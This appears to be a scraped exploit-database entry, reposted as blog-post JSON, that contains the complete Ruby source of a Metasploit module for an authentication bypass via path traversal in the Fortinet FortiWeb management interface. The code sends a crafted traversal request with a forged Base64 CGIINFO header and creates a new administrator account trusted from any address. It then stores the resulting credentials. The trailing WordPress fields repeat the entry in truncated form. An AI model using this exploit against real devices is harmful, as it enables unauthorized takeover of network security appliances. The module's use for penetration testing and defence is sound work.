{“lastseen”:”2025-11-14T19:04:27″,”description”:”This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface to create…”,”published”:”2025-11-14T18:57:52″,”modified”:”2025-11-14T18:57:52″,”type”:”metasploit”,”title”:”Fortinet FortiWeb create new local admin”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Fortinet FortiWeb create new local admin’,\\n ‘Description’ =\\u003e %q{\\n This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet\\n FortiWeb management interface to create a new local administrator user account. This vulnerability\\n appears to be patched in the latest version of the product, version 8.0.2.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Defused’, # PoC from honeypot\\n ‘sfewer-r7’, # MSF module\\n ],\\n ‘References’ =\\u003e [\\n # [‘C V E’, ‘2025-??’], # No known CVE assigned yet (as of Nov 14, 2025)\\n [‘URL’, ‘https:\/\/x.com\/defusedcyber\/status\/1975242250373517373’], # Original PoC posted online\\n [‘URL’, ‘https:\/\/github.com\/watchtowrlabs\/watchTowr-vs-Fortiweb-AuthBypass’], # PoC\\n [‘URL’, ‘https:\/\/www.pwndefend.com\/2025\/11\/13\/suspected-fortinet-zero-day-exploited-in-the-wild\/’],\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild\/’]\\n ],\\n # ‘D i s c l o s u r e D a t e’ =\\u003e ‘2025-??-??’, # Not yet disclosed by the vendor (as of Nov 14, 2025)\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 443,\\n ‘SSL’ =\\u003e true\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n OptString.new(‘NEW_USERNAME’, [true, ‘Username to use when creating a new admin account’, Faker::Internet.username]),\\n OptString.new(‘NEW_PASSWORD’, [true, ‘Password to use when creating a new admin account’, Rex::Text.rand_text_alpha(8)])\\n ])\\n\\n register_advanced_options(\\n [\\n OptString.new(‘FORTIWEB_ACCESS_PROFILE’, [ true, ‘The access profile to use for the new admin account’, ‘prof_admin’ ]),\\n OptString.new(‘FORTIWEB_DOMAIN’, [ true, ‘The domain to use for the new admin account’, ‘root’ ]),\\n OptString.new(‘FORTIWEB_DEFAULT_ADMIN_ACCOUNT’, [ true, ‘The default FortiWeb admin account name’, ‘admin’ ])\\n ]\\n )\\n end\\n\\n def check\\n res = post_auth_bypass_request({ data: {} })\\n\\n return CheckCode::Unknown(‘Connection failed’) unless res\\n\\n return Exploit::CheckCode::Safe(‘Received a 403 Forbidden response’) if res.code == 403\\n\\n Exploit::CheckCode::Appears\\n end\\n\\n def run\\n request_data = {\\n data: {\\n ‘q_type’ =\\u003e 1,\\n ‘name’ =\\u003e datastore[‘NEW_USERNAME’],\\n ‘access-profile’ =\\u003e datastore[‘FORTIWEB_ACCESS_PROFILE’],\\n ‘access-profile_val’ =\\u003e ‘0’,\\n ‘trusthostv4’ =\\u003e ‘0.0.0.0\/0’,\\n ‘trusthostv6’ =\\u003e ‘::\/0’,\\n ‘last-name’ =\\u003e ”,\\n ‘first-name’ =\\u003e ”,\\n ’email-address’ =\\u003e ”,\\n ‘phone-number’ =\\u003e ”,\\n ‘mobile-number’ =\\u003e ”,\\n ‘hidden’ =\\u003e 0,\\n ‘domains’ =\\u003e datastore[‘FORTIWEB_DOMAIN’],\\n ‘sz_dashboard’ =\\u003e -1,\\n ‘type’ =\\u003e ‘local-user’,\\n ‘type_val’ =\\u003e ‘0’,\\n ‘admin-usergrp_val’ =\\u003e ‘0’,\\n ‘wildcard_val’ =\\u003e ‘0’,\\n ‘accprofile-override_val’ =\\u003e ‘0’,\\n ‘sshkey’ =\\u003e ”,\\n ‘passwd-set-time’ =\\u003e 0,\\n ‘history-password-pos’ =\\u003e 0,\\n ‘history-password0’ =\\u003e ”,\\n ‘history-password1’ =\\u003e ”,\\n ‘history-password2’ =\\u003e ”,\\n ‘history-password3’ =\\u003e ”,\\n ‘history-password4’ =\\u003e ”,\\n ‘history-password5’ =\\u003e ”,\\n ‘history-password6’ =\\u003e ”,\\n ‘history-password7’ =\\u003e ”,\\n ‘history-password8’ =\\u003e ”,\\n ‘history-password9’ =\\u003e ”,\\n ‘force-password-change’ =\\u003e ‘disable’,\\n ‘force-password-change_val’ =\\u003e ‘0’,\\n ‘password’ =\\u003e datastore[‘NEW_PASSWORD’]\\n }\\n }\\n\\n res = post_auth_bypass_request(request_data)\\n\\n return fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘Connection failed.’) unless res\\n\\n return fail_with(Msf::Exploit::Failure::NotVulnerable, ‘Target does not appear vulnerable (403 Forbidden response)’) if res.code == 403\\n\\n unless res.code == 200\\n if res.headers[‘Content-Type’] == ‘application\/json’\\n begin\\n response_data = JSON.parse(res.body)\\n print_bad(response_data.to_s)\\n rescue JSON::ParserError\\n print_bad(‘failed to parse response JSON data’)\\n end\\n end\\n return fail_with(Msf::Exploit::Failure::UnexpectedReply, \\”Target returned an unexpected response (#{res.code})\\”)\\n end\\n\\n print_good(\\”New admin account successfully created: #{datastore[‘NEW_USERNAME’]}:#{datastore[‘NEW_PASSWORD’]}\\”)\\n\\n print_good(\\”Login via #{ssl ? ‘https’ : ‘http’}:\/\/#{datastore[‘RHOSTS’]}:#{datastore[‘RPORT’]}#{normalize_uri(target_uri.path, ‘login’)}\\”)\\n\\n store_credentials(datastore[‘NEW_USERNAME’], datastore[‘NEW_PASSWORD’], Metasploit::Model::Login::Status::UNTRIED)\\n end\\n\\n def post_auth_bypass_request(request_data)\\n cgi_info = {\\n ‘username’ =\\u003e datastore[‘FORTIWEB_DEFAULT_ADMIN_ACCOUNT’],\\n ‘profname’ =\\u003e datastore[‘FORTIWEB_ACCESS_PROFILE’],\\n ‘vdom’ =\\u003e datastore[‘FORTIWEB_DOMAIN’],\\n ‘loginname’ =\\u003e datastore[‘FORTIWEB_DEFAULT_ADMIN_ACCOUNT’]\\n }\\n\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v2.0\/cmdb\/system\/admin%3F\/..\/..\/..\/..\/..\/cgi-bin\/fwbcgi’),\\n ‘headers’ =\\u003e {\\n ‘CGIINFO’ =\\u003e Base64.strict_encode64(cgi_info.to_json)\\n },\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e request_data.to_json\\n )\\n end\\n\\n def store_credentials(username, password, login_status)\\n service_data = {\\n address: datastore[‘RHOST’],\\n port: datastore[‘RPORT’],\\n service_name: ssl ? ‘https’ : ‘http’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: username,\\n private_data: password,\\n private_type: :password\\n }.merge(service_data)\\n\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n last_attempted_at: DateTime.now,\\n status: login_status\\n }.merge(service_data)\\n\\n create_credential_login(login_data)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/http\/fortinet_fortiweb_create_admin.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/http\/fortinet_fortiweb_create_admin\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-14T19:04:27″,”description”:”This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface to create…”,”published”:”2025-11-14T18:57:52″,”modified”:”2025-11-14T18:57:52″,”type”:”metasploit”,”title”:”Fortinet FortiWeb create new local admin”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-26284","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n